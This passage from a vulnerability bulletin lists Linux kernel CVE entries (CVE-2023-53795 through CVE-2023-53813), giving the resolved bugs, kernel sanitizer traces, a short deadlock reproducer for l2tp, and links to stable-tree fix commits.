arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The solution is to not increment the refcount on the IOMMUFD_DESTROY path at all. Instead use the xa_lock to serialize everything. The refcount check == 1 and xa_erase can be done under a single critical region. This avoids the need for any refcount incrementing. It has the downside that if userspace races destroy with other operations it will get an EBUSY instead of waiting, but this is kind of racing is already dangerous. | 2025-12-09 | not yet calculated | CVE-2023-53795 | https://git.kernel.org/stable/c/495b327435b0298e9b3b434f5834d459a93673ce https://git.kernel.org/stable/c/99f98a7c0d6985d5507c8130a981972e4b7b3bdc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix information leak in f2fs_move_inline_dirents() When converting an inline directory to a regular one, f2fs is leaking uninitialized memory to disk because it doesn't initialize the entire directory block. Fix this by zero-initializing the block. This bug was introduced by commit 4ec17d688d74 ("f2fs: avoid unneeded initializing when converting inline dentry"), which didn't consider the security implications of leaking uninitialized memory to disk. This was found by running xfstest generic/435 on a KMSAN-enabled kernel. | 2025-12-09 | not yet calculated | CVE-2023-53796 | https://git.kernel.org/stable/c/4e3b4b170bd43db1d8a93a6bd0ea434b17cc86f7 https://git.kernel.org/stable/c/a6807ef0f3b3d8508d3b07a2e35de8a91820a014 https://git.kernel.org/stable/c/2bef8314fcf94ddc27e22d03f237c0fafd00de33 https://git.kernel.org/stable/c/00b5587326625d0fddb2a5f5a3d4acd950102ace https://git.kernel.org/stable/c/117d4f6687b1f74423b5d398ea95c63b262a8e73 https://git.kernel.org/stable/c/f07a8d61b6ea81bb3cbe0638af40f8824d6147fd https://git.kernel.org/stable/c/eebaecef0095bb8f493c03982da75c6e7bae1056 https://git.kernel.org/stable/c/9a5571cff4ffcfc24847df9fd545cc5799ac0ee5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: wacom: Use ktime_t rather than int when dealing with timestamps Code which interacts with timestamps needs to use the ktime_t type returned by functions like ktime_get. The int type does not offer enough space to store these values, and attempting to use it is a recipe for problems. In this particular case, overflows would occur when calculating/storing timestamps leading to incorrect values being reported to userspace. In some cases these bad timestamps cause input handling in userspace to appear hung. | 2025-12-09 | not yet calculated | CVE-2023-53797 | https://git.kernel.org/stable/c/99036f1aed7e82773904f5d91a9897bb3e507fd9 https://git.kernel.org/stable/c/9598a647ecc8f300b0540abf9d3b3439859d163b https://git.kernel.org/stable/c/67ce7724637c6adb66f788677cb50b82615de0ac https://git.kernel.org/stable/c/d89750b19681581796dfbe3689bbb5d439b99b24 https://git.kernel.org/stable/c/bdeaa883b765709f231f47f9d6cc76c837a15396 https://git.kernel.org/stable/c/d0198363f9108e4adb2511e607ba91e44779e8b1 https://git.kernel.org/stable/c/9a6c0e28e215535b2938c61ded54603b4e5814c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: Fix uninitialized number of lanes It is not possible to set the number of lanes when setting link modes using the legacy IOCTL ethtool interface. Since 'struct ethtool_link_ksettings' is not initialized in this path, drivers receive an uninitialized number of lanes in 'struct ethtool_link_ksettings::lanes'. When this information is later queried from drivers, it results in the ethtool code making decisions based on uninitialized memory, leading to the following KMSAN splat [1]. In practice, this most likely only happens with the tun driver that simply returns whatever it got in the set operation. As far as I can tell, this uninitialized memory is not leaked to user space thanks to the 'ethtool_ops->cap_link_lanes_supported' check in linkmodes_prepare_data(). Fix by initializing the structure in the IOCTL path. Did not find any more call sites that pass an uninitialized structure when calling 'ethtool_ops::set_link_ksettings()'. [1] BUG: KMSAN: uninit-value in ethnl_update_linkmodes net/ethtool/linkmodes.c:273 [inline] BUG: KMSAN: uninit-value in ethnl_set_linkmodes+0x190b/0x19d0 net/ethtool/linkmodes.c:333 ethnl_update_linkmodes net/ethtool/linkmodes.c:273 [inline] ethnl_set_linkmodes+0x190b/0x19d0 net/ethtool/linkmodes.c:333 ethnl_default_set_doit+0x88d/0xde0 net/ethtool/netlink.c:640 genl_family_rcv_msg_doit net/netlink/genetlink.c:968 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1048 [inline] genl_rcv_msg+0x141a/0x14c0 net/netlink/genetlink.c:1065 netlink_rcv_skb+0x3f8/0x750 net/netlink/af_netlink.c:2577 genl_rcv+0x40/0x60 net/netlink/genetlink.c:1076 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf41/0x1270 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x127d/0x1430 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] ____sys_sendmsg+0xa24/0xe40 net/socket.c:2501 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2555 __sys_sendmsg net/socket.c:2584 [inline] __do_sys_sendmsg net/socket.c:2593 [inline] __se_sys_sendmsg net/socket.c:2591 [inline] __x64_sys_sendmsg+0x36b/0x540 net/socket.c:2591 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: tun_get_link_ksettings+0x37/0x60 drivers/net/tun.c:3544 __ethtool_get_link_ksettings+0x17b/0x260 net/ethtool/ioctl.c:441 ethnl_set_linkmodes+0xee/0x19d0 net/ethtool/linkmodes.c:327 ethnl_default_set_doit+0x88d/0xde0 net/ethtool/netlink.c:640 genl_family_rcv_msg_doit net/netlink/genetlink.c:968 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1048 [inline] genl_rcv_msg+0x141a/0x14c0 net/netlink/genetlink.c:1065 netlink_rcv_skb+0x3f8/0x750 net/netlink/af_netlink.c:2577 genl_rcv+0x40/0x60 net/netlink/genetlink.c:1076 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf41/0x1270 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x127d/0x1430 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] ____sys_sendmsg+0xa24/0xe40 net/socket.c:2501 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2555 __sys_sendmsg net/socket.c:2584 [inline] __do_sys_sendmsg net/socket.c:2593 [inline] __se_sys_sendmsg net/socket.c:2591 [inline] __x64_sys_sendmsg+0x36b/0x540 net/socket.c:2591 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: tun_set_link_ksettings+0x37/0x60 drivers/net/tun.c:3553 ethtool_set_link_ksettings+0x600/0x690 net/ethtool/ioctl.c:609 __dev_ethtool net/ethtool/ioctl.c:3024 [inline] dev_ethtool+0x1db9/0x2a70 net/ethtool/ioctl.c:3078 dev_ioctl+0xb07/0x1270 net/core/dev_ioctl.c:524 sock_do_ioctl+0x295/0x540 net/socket.c:1213 sock_i ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53798 | https://git.kernel.org/stable/c/da81af0ef8092ecacd87fac3229c29e2e0ce39fd https://git.kernel.org/stable/c/942a2a0184f7bb1c1ae4bbc556559c86c054b0d2 https://git.kernel.org/stable/c/6456d80045d6de47734b1a3879c91f72af186529 https://git.kernel.org/stable/c/72808c4ab5fd01bf1214195005e15b434bf55cef https://git.kernel.org/stable/c/9ad685dbfe7e856bbf17a7177b64676d324d6ed7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: api - Use work queue in crypto_destroy_instance The function crypto_drop_spawn expects to be called in process context. However, when an instance is unregistered while it still has active users, the last user may cause the instance to be freed in atomic context. Fix this by delaying the freeing to a work queue. | 2025-12-09 | not yet calculated | CVE-2023-53799 | https://git.kernel.org/stable/c/625bf86bf53eb7a8ee60fb9dc45b272b77e5ce1c https://git.kernel.org/stable/c/048545d9fc6424b0a11e7e8771225bb9afe09422 https://git.kernel.org/stable/c/c4cb61c5f976183c07d16b0071f0c60bc212ef1f https://git.kernel.org/stable/c/867a146690960ac7b89ce40f4ee60dd32eeb1682 https://git.kernel.org/stable/c/c0dbcebc7f390ec7dbe010dcc22c60f0c6bfc26d https://git.kernel.org/stable/c/9ae4577bc077a7e32c3c7d442c95bc76865c0f17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix use-after-free when volume resizing failed There is an use-after-free problem reported by KASAN: ================================================================== BUG: KASAN: use-after-free in ubi_eba_copy_table+0x11f/0x1c0 [ubi] Read of size 8 at addr ffff888101eec008 by task ubirsvol/4735 CPU: 2 PID: 4735 Comm: ubirsvol Not tainted 6.1.0-rc1-00003-g84fa3304a7fc-dirty #14 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x34/0x44 print_report+0x171/0x472 kasan_report+0xad/0x130 ubi_eba_copy_table+0x11f/0x1c0 [ubi] ubi_resize_volume+0x4f9/0xbc0 [ubi] ubi_cdev_ioctl+0x701/0x1850 [ubi] __x64_sys_ioctl+0x11d/0x170 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 </TASK> When ubi_change_vtbl_record() returns an error in ubi_resize_volume(), "new_eba_tbl" will be freed on error handing path, but it is holded by "vol->eba_tbl" in ubi_eba_replace_table(). It means that the liftcycle of "vol->eba_tbl" and "vol" are different, so when resizing volume in next time, it causing an use-after-free fault. Fix it by not freeing "new_eba_tbl" after it replaced in ubi_eba_replace_table(), while will be freed in next volume resizing. | 2025-12-09 | not yet calculated | CVE-2023-53800 | https://git.kernel.org/stable/c/bf9875aa7f7d624a8c084425b14bf7e5907ebc30 https://git.kernel.org/stable/c/bf795ebbb9995e2fe7945de71177f01c2f1215dc https://git.kernel.org/stable/c/9c8be1f165baee53b5a36ea0b3c9281d403a1d0b https://git.kernel.org/stable/c/35f8d4064e54c18424db2997059d4c0b1d13d093 https://git.kernel.org/stable/c/53818746e549e61841428892a8d94344494be797 https://git.kernel.org/stable/c/b0c951742348d216f094d16ed4f70ae73db881c0 https://git.kernel.org/stable/c/3d6378f7056ac7350338f941001162a8f660853c https://git.kernel.org/stable/c/9af31d6ec1a4be4caab2550096c6bd2ba8fba472 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/sprd: Release dma buffer to avoid memory leak When attaching to a domain, the driver would alloc a DMA buffer which is used to store address mapping table, and it need to be released when the IOMMU domain is freed. | 2025-12-09 | not yet calculated | CVE-2023-53801 | https://git.kernel.org/stable/c/92c089a931fd3939cd32318cf4f54e69e8f51a19 https://git.kernel.org/stable/c/8745f3592ee4a7b49ede16ddd3f12a41ecaa23c9 https://git.kernel.org/stable/c/d0a917fd5e3b3ed9d9306b4260ba684b982da9f3 https://git.kernel.org/stable/c/9afea57384d4ae7b2034593eac7fa76c7122762a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: htc_hst: free skb in ath9k_htc_rx_msg() if there is no callback function It is stated that ath9k_htc_rx_msg() either frees the provided skb or passes its management to another callback function. However, the skb is not freed in case there is no another callback function, and Syzkaller was able to cause a memory leak. Also minor comment fix. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-09 | not yet calculated | CVE-2023-53802 | https://git.kernel.org/stable/c/b11f95f65cc52ee3a756e6f6a88df37a203e25bd https://git.kernel.org/stable/c/68171c006c8645a3e0293a6c3e6037c6538ac1c5 https://git.kernel.org/stable/c/564bc2222bf50eb6cdee715a5431bf4dc9f923c1 https://git.kernel.org/stable/c/ec246dfe006b2a8f36353f7489e4f525114db9a5 https://git.kernel.org/stable/c/c0c0614f143b568cd0e9525d53cf12e5dcd11987 https://git.kernel.org/stable/c/5a84e51f72580fc70066b03f3dac38421e702a0b https://git.kernel.org/stable/c/bbfababb4f899fe1556eac195f9774b6fe675fb6 https://git.kernel.org/stable/c/9b25e3985477ac3f02eca5fc1e0cc6850a3f7e69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ses: Fix slab-out-of-bounds in ses_enclosure_data_process() A fix for: BUG: KASAN: slab-out-of-bounds in ses_enclosure_data_process+0x949/0xe30 [ses] Read of size 1 at addr ffff88a1b043a451 by task systemd-udevd/3271 Checking after (and before in next loop) addl_desc_ptr[1] is sufficient, we expect the size to be sanitized before first access to addl_desc_ptr[1]. Make sure we don't walk beyond end of page. | 2025-12-09 | not yet calculated | CVE-2023-53803 | https://git.kernel.org/stable/c/da1a955c48a16e16e925d6544793914e52a6fa51 https://git.kernel.org/stable/c/9e5c7d52085b8c84bc82a261580f0eb170039325 https://git.kernel.org/stable/c/467afb1dd630d8c6d172bd6cacc125199b5f4f2d https://git.kernel.org/stable/c/e4dd25da784b2e07dbfbf04509afa4c5a1375227 https://git.kernel.org/stable/c/2b28a7d261cb309912596d6a2d383ca370483527 https://git.kernel.org/stable/c/0dfe68394cbe1d4fe579fb325ecc813c50528c5a https://git.kernel.org/stable/c/799e8dd2022d2e13f0c5c1906b40ceca07a23349 https://git.kernel.org/stable/c/9b4f5028e493cb353a5c8f5c45073eeea0303abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix use-after-free bug of nilfs_root in nilfs_evict_inode() During unmount process of nilfs2, nothing holds nilfs_root structure after nilfs2 detaches its writer in nilfs_detach_log_writer(). However, since nilfs_evict_inode() uses nilfs_root for some cleanup operations, it may cause use-after-free read if inodes are left in "garbage_list" and released by nilfs_dispose_list() at the end of nilfs_detach_log_writer(). Fix this issue by modifying nilfs_evict_inode() to only clear inode without additional metadata changes that use nilfs_root if the file system is degraded to read-only or the writer is detached. | 2025-12-09 | not yet calculated | CVE-2023-53804 | https://git.kernel.org/stable/c/f31e18131ee2ce80a4da5c808221d25b1ae9ad6d https://git.kernel.org/stable/c/2a782ea8ebd712a458466e3103e2881b4f886cb5 https://git.kernel.org/stable/c/116d53f09ff52e6f98e3fe1f85d8898d6ba26c68 https://git.kernel.org/stable/c/6b4205ea97901f822004e6c8d59484ccfda03faa https://git.kernel.org/stable/c/b8427b8522d9ede53015ba45a9978ba68d1162f5 https://git.kernel.org/stable/c/acc2a40e428f12780004e1e9fce4722d88f909fd https://git.kernel.org/stable/c/fb8e8d58f116d069e5939e1f786ac84e7fa4533e https://git.kernel.org/stable/c/9b5a04ac3ad9898c4745cba46ea26de74ba56a8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: populate subvp cmd info only for the top pipe [Why] System restart observed while changing the display resolution to 8k with extended mode. Sytem restart was caused by a page fault. [How] When the driver populates subvp info it did it for both the pipes using vblank which caused an outof bounds array access causing the page fault. added checks to allow the top pipe only to fix this issue. | 2025-12-09 | not yet calculated | CVE-2023-53806 | https://git.kernel.org/stable/c/92e6c79acad4b96efeff261d27bdbd8089a7dd24 https://git.kernel.org/stable/c/375d192eb1f1d9229a6d994da7ba31f3582b106b https://git.kernel.org/stable/c/9bb10b7aaec3b6278f9cc410c17dcaa129bbbbf0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: clocking-wizard: Fix Oops in clk_wzrd_register_divider() Smatch detected this potential error pointer dereference clk_wzrd_register_divider(). If devm_clk_hw_register() fails then it sets "hw" to an error pointer and then dereferences it on the next line. Return the error directly instead. | 2025-12-09 | not yet calculated | CVE-2023-53807 | https://git.kernel.org/stable/c/2f276dd9c0f835242836d9f6823035158ce2585c https://git.kernel.org/stable/c/b35cb0c05b8dafe23ae5e8b605a91b88bcf4aba7 https://git.kernel.org/stable/c/25dbdfb7b71ef8601d00c6d9a2b1a96de28b30c5 https://git.kernel.org/stable/c/f078a65ebf930f4305e3c415a8338d22391642c9 https://git.kernel.org/stable/c/9c632a6396505a019ea6d12b5ab45e659a542a93 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mwifiex: fix memory leak in mwifiex_histogram_read() Always free the zeroed page on return from 'mwifiex_histogram_read()'. | 2025-12-09 | not yet calculated | CVE-2023-53808 | https://git.kernel.org/stable/c/d3b53ac2b60283f84bcc650aaa8af98500f37b56 https://git.kernel.org/stable/c/7be90670b967d11f53a9d45bc88fa8ac9daf9709 https://git.kernel.org/stable/c/8f717752f94efae84853e17f2589665c330a0cf5 https://git.kernel.org/stable/c/0c4240d23db525208fd40dd6371ca3254fa1b93d https://git.kernel.org/stable/c/308eb3a609ac39ca9c3e466b35e8825007c8d826 https://git.kernel.org/stable/c/84081b4baafb49211193c6a056d5aee9c0e6ab8e https://git.kernel.org/stable/c/5d66b32a6ecf2e2e1a9523eaa4f8b314832fe06c https://git.kernel.org/stable/c/f76e1da838377777557d78dfeb6d8c532f7118be https://git.kernel.org/stable/c/9c8fd72a5c2a031cbc680a2990107ecd958ffcdb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: l2tp: Avoid possible recursive deadlock in l2tp_tunnel_register() When a file descriptor of pppol2tp socket is passed as file descriptor of UDP socket, a recursive deadlock occurs in l2tp_tunnel_register(). This situation is reproduced by the following program: int main(void) { int sock; struct sockaddr_pppol2tp addr; sock = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (sock < 0) { perror("socket"); return 1; } addr.sa_family = AF_PPPOX; addr.sa_protocol = PX_PROTO_OL2TP; addr.pppol2tp.pid = 0; addr.pppol2tp.fd = sock; addr.pppol2tp.addr.sin_family = PF_INET; addr.pppol2tp.addr.sin_port = htons(0); addr.pppol2tp.addr.sin_addr.s_addr = inet_addr("192.168.0.1"); addr.pppol2tp.s_tunnel = 1; addr.pppol2tp.s_session = 0; addr.pppol2tp.d_tunnel = 0; addr.pppol2tp.d_session = 0; if (connect(sock, (const struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("connect"); return 1; } return 0; } This program causes the following lockdep warning: ============================================ WARNING: possible recursive locking detected 6.2.0-rc5-00205-gc96618275234 #56 Not tainted -------------------------------------------- repro/8607 is trying to acquire lock: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: l2tp_tunnel_register+0x2b7/0x11c0 but task is already holding lock: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: pppol2tp_connect+0xa82/0x1a30 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(sk_lock-AF_PPPOX); lock(sk_lock-AF_PPPOX); *** DEADLOCK *** May be due to missing lock nesting notation 1 lock held by repro/8607: #0: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: pppol2tp_connect+0xa82/0x1a30 stack backtrace: CPU: 0 PID: 8607 Comm: repro Not tainted 6.2.0-rc5-00205-gc96618275234 #56 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x100/0x178 __lock_acquire.cold+0x119/0x3b9 ? lockdep_hardirqs_on_prepare+0x410/0x410 lock_acquire+0x1e0/0x610 ? l2tp_tunnel_register+0x2b7/0x11c0 ? lock_downgrade+0x710/0x710 ? __fget_files+0x283/0x3e0 lock_sock_nested+0x3a/0xf0 ? l2tp_tunnel_register+0x2b7/0x11c0 l2tp_tunnel_register+0x2b7/0x11c0 ? sprintf+0xc4/0x100 ? l2tp_tunnel_del_work+0x6b0/0x6b0 ? debug_object_deactivate+0x320/0x320 ? lockdep_init_map_type+0x16d/0x7a0 ? lockdep_init_map_type+0x16d/0x7a0 ? l2tp_tunnel_create+0x2bf/0x4b0 ? l2tp_tunnel_create+0x3c6/0x4b0 pppol2tp_connect+0x14e1/0x1a30 ? pppol2tp_put_sk+0xd0/0xd0 ? aa_sk_perm+0x2b7/0xa80 ? aa_af_perm+0x260/0x260 ? bpf_lsm_socket_connect+0x9/0x10 ? pppol2tp_put_sk+0xd0/0xd0 __sys_connect_file+0x14f/0x190 __sys_connect+0x133/0x160 ? __sys_connect_file+0x190/0x190 ? lockdep_hardirqs_on+0x7d/0x100 ? ktime_get_coarse_real_ts64+0x1b7/0x200 ? ktime_get_coarse_real_ts64+0x147/0x200 ? __audit_syscall_entry+0x396/0x500 __x64_sys_connect+0x72/0xb0 do_syscall_64+0x38/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd This patch fixes the issue by getting/creating the tunnel before locking the pppol2tp socket. | 2025-12-09 | not yet calculated | CVE-2023-53809 | https://git.kernel.org/stable/c/4a413d360959962995e16a899cf2b9ef53e9fcb9 https://git.kernel.org/stable/c/f6df58aa15f7d469f69b1dd21b001ff483255244 https://git.kernel.org/stable/c/4bb736b40475528ac1aa8c98b368563618488a70 https://git.kernel.org/stable/c/5370647dd745bb3d8f37057006be207ddd8e9314 https://git.kernel.org/stable/c/9ca5e7ecab064f1f47da07f7c1ddf40e4bc0e5ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-mq: release crypto keyslot before reporting I/O complete Once all I/O using a blk_crypto_key has completed, filesystems can call blk_crypto_evict_key(). However, the block layer currently doesn't call blk_crypto_put_keyslot() until the request is being freed, which happens after upper layers have been told (via bio_endio()) the I/O has completed. This causes a race condition where blk_crypto_evict_key() can see 'slot_refs != 0' without there being an actual bug. This makes __blk_crypto_evict_key() hit the 'WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)' and return without doing anything, eventually causing a use-after-free in blk_crypto_reprogram_all_keys(). (This is a very rare bug and has only been seen when per-file keys are being used with fscrypt.) There are two options to fix this: either release the keyslot before bio_endio() is called on the request's last bio, or make __blk_crypto_evict_key() ignore slot_refs. Let's go with the first solution, since it preserves the ability to report bugs (via WARN_ON_ONCE) where a key is evicted while still in-use. | 2025-12-09 | not yet calculated | CVE-2023-53810 | https://git.kernel.org/stable/c/874bdf43b4a7dc5463c31508f62b3e42eb237b08 https://git.kernel.org/stable/c/d206f79d9cd658665b37ce8134c6ec849ac7af0c https://git.kernel.org/stable/c/7d206ec7a04e8545828191b6ea8b49d3ea61391f https://git.kernel.org/stable/c/b278570e2c59d538216f8b656e97680188a8fba4 https://git.kernel.org/stable/c/92d5d233b9ff531cf9cc36ab4251779e07adb633 https://git.kernel.org/stable/c/9cd1e566676bbcb8a126acd921e4e194e6339603 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Cap MSIX used to online CPUs + 1 The irdma driver can use a maximum number of msix vectors equal to num_online_cpus() + 1 and the kernel warning stack below is shown if that number is exceeded. The kernel throws a warning as the driver tries to update the affinity hint with a CPU mask greater than the max CPU IDs. Fix this by capping the MSIX vectors to num_online_cpus() + 1. WARNING: CPU: 7 PID: 23655 at include/linux/cpumask.h:106 irdma_cfg_ceq_vector+0x34c/0x3f0 [irdma] RIP: 0010:irdma_cfg_ceq_vector+0x34c/0x3f0 [irdma] Call Trace: irdma_rt_init_hw+0xa62/0x1290 [irdma] ? irdma_alloc_local_mac_entry+0x1a0/0x1a0 [irdma] ? __is_kernel_percpu_address+0x63/0x310 ? rcu_read_lock_held_common+0xe/0xb0 ? irdma_lan_unregister_qset+0x280/0x280 [irdma] ? irdma_request_reset+0x80/0x80 [irdma] ? ice_get_qos_params+0x84/0x390 [ice] irdma_probe+0xa40/0xfc0 [irdma] ? rcu_read_lock_bh_held+0xd0/0xd0 ? irdma_remove+0x140/0x140 [irdma] ? rcu_read_lock_sched_held+0x62/0xe0 ? down_write+0x187/0x3d0 ? auxiliary_match_id+0xf0/0x1a0 ? irdma_remove+0x140/0x140 [irdma] auxiliary_bus_probe+0xa6/0x100 __driver_probe_device+0x4a4/0xd50 ? __device_attach_driver+0x2c0/0x2c0 driver_probe_device+0x4a/0x110 __driver_attach+0x1aa/0x350 bus_for_each_dev+0x11d/0x1b0 ? subsys_dev_iter_init+0xe0/0xe0 bus_add_driver+0x3b1/0x610 driver_register+0x18e/0x410 ? 0xffffffffc0b88000 irdma_init_module+0x50/0xaa [irdma] do_one_initcall+0x103/0x5f0 ? perf_trace_initcall_level+0x420/0x420 ? do_init_module+0x4e/0x700 ? __kasan_kmalloc+0x7d/0xa0 ? kmem_cache_alloc_trace+0x188/0x2b0 ? kasan_unpoison+0x21/0x50 do_init_module+0x1d1/0x700 load_module+0x3867/0x5260 ? layout_and_allocate+0x3990/0x3990 ? rcu_read_lock_held_common+0xe/0xb0 ? rcu_read_lock_sched_held+0x62/0xe0 ? rcu_read_lock_bh_held+0xd0/0xd0 ? __vmalloc_node_range+0x46b/0x890 ? lock_release+0x5c8/0xba0 ? alloc_vm_area+0x120/0x120 ? selinux_kernel_module_from_file+0x2a5/0x300 ? __inode_security_revalidate+0xf0/0xf0 ? __do_sys_init_module+0x1db/0x260 __do_sys_init_module+0x1db/0x260 ? load_module+0x5260/0x5260 ? do_syscall_64+0x22/0x450 do_syscall_64+0xa5/0x450 entry_SYSCALL_64_after_hwframe+0x66/0xdb | 2025-12-09 | not yet calculated | CVE-2023-53811 | https://git.kernel.org/stable/c/87674a359ad173a3b8cd484e92e4f1901666da4c https://git.kernel.org/stable/c/b3bd44bf20cb3a6a47aa4373e1817147efb4be04 https://git.kernel.org/stable/c/209e4aa9a7b636d8aaa1297e1d089ee2ed91d73f https://git.kernel.org/stable/c/9cd9842c46996ef62173c36619c746f57416bcb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: fix decoder disable pm crash Can't call pm_runtime_disable when the architecture support sub device for 'dev->pm.dev' is NUll, or will get below crash log. [ 10.771551] pc : _raw_spin_lock_irq+0x4c/0xa0 [ 10.771556] lr : __pm_runtime_disable+0x30/0x130 [ 10.771558] sp : ffffffc01e4cb800 [ 10.771559] x29: ffffffc01e4cb800 x28: ffffffdf082108a8 [ 10.771563] x27: ffffffc01e4cbd70 x26: ffffff8605df55f0 [ 10.771567] x25: 0000000000000002 x24: 0000000000000002 [ 10.771570] x23: ffffff85c0dc9c00 x22: 0000000000000001 [ 10.771573] x21: 0000000000000001 x20: 0000000000000000 [ 10.771577] x19: 00000000000000f4 x18: ffffffdf2e9fbe18 [ 10.771580] x17: 0000000000000000 x16: ffffffdf2df13c74 [ 10.771583] x15: 00000000000002ea x14: 0000000000000058 [ 10.771587] x13: ffffffdf2de1b62c x12: ffffffdf2e9e30e4 [ 10.771590] x11: 0000000000000000 x10: 0000000000000001 [ 10.771593] x9 : 0000000000000000 x8 : 00000000000000f4 [ 10.771596] x7 : 6bff6264632c6264 x6 : 0000000000008000 [ 10.771600] x5 : 0080000000000000 x4 : 0000000000000001 [ 10.771603] x3 : 0000000000000008 x2 : 0000000000000001 [ 10.771608] x1 : 0000000000000000 x0 : 00000000000000f4 [ 10.771613] Call trace: [ 10.771617] _raw_spin_lock_irq+0x4c/0xa0 [ 10.771620] __pm_runtime_disable+0x30/0x130 [ 10.771657] mtk_vcodec_probe+0x69c/0x728 [mtk_vcodec_dec 800cc929d6631f79f9b273254c8db94d0d3500dc] [ 10.771662] platform_drv_probe+0x9c/0xbc [ 10.771665] really_probe+0x13c/0x3a0 [ 10.771668] driver_probe_device+0x84/0xc0 [ 10.771671] device_driver_attach+0x54/0x78 | 2025-12-09 | not yet calculated | CVE-2023-53812 | https://git.kernel.org/stable/c/c692a44bc5146eb487f40798a1ea8dd57fd2607d https://git.kernel.org/stable/c/03e9773388a27242e6139f3d5b5fd00112adb5c3 https://git.kernel.org/stable/c/34fe290090ecfcf405cad9d0e0ddc8b8246ffaa2 https://git.kernel.org/stable/c/9d2f13fb47dcab6d094f34ecfd6a879a409722b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix rbtree traversal bug in ext4_mb_use_preallocated During allocations, while looking for preallocations(PA) in the per inode rbtree, we can't do a direct traversal of the tree because ext4_mb_discard_group_preallocation() can paralelly mark the pa deleted and that can cause direct traversal to skip some entries. This was leading to a BUG_ON() being hit [1] when we missed a PA that could satisfy our request and ultimately tried to create a new PA that would overlap with the missed one. To makes sure we handle that case while still keeping the performance of the rbtree, we make use of the fact that the only pa that could possibly overlap the original goal start is the one that satisfies the below conditions: 1. It must have it's logical start immediately to the left of (ie less than) original logical start. 2. It must not be deleted To find this pa we use the following traversal method: 1. Descend into the rbtree normally to find the immediate neighboring PA. Here we keep descending irrespective of if the PA is deleted or if it overlaps with our request etc. The goal is to find an immediately adjacent PA. 2. If the found PA is on right of original goal, use rb_prev() to find the left adjacent PA. 3. Check if this PA is deleted and keep moving left with rb_prev() until a non deleted PA is found. 4. This is the PA we are looking for. Now we can check if it can satisfy the original request and proceed accordingly. This approach also takes care of having deleted PAs in the tree. (While we are at it, also fix a possible overflow bug in calculating the end of a PA) [1] https://lore.kernel.org/linux-ext4/CA+G9fYv2FRpLqBZf34ZinR8bU2_ZRAUOjKAD3+tKRFaEQHtt8Q@mail.gmail.com/ | 2025-12-09 | not yet calculated | CVE-2023-53813 | https://git.kernel.org/stable/c/339fee69a1daa71d6f97e47a867e2c32419a2406 https://git.kernel.org/stable/c/9d3de7ee192a6a253f475197fe4d2e2af10a731f |
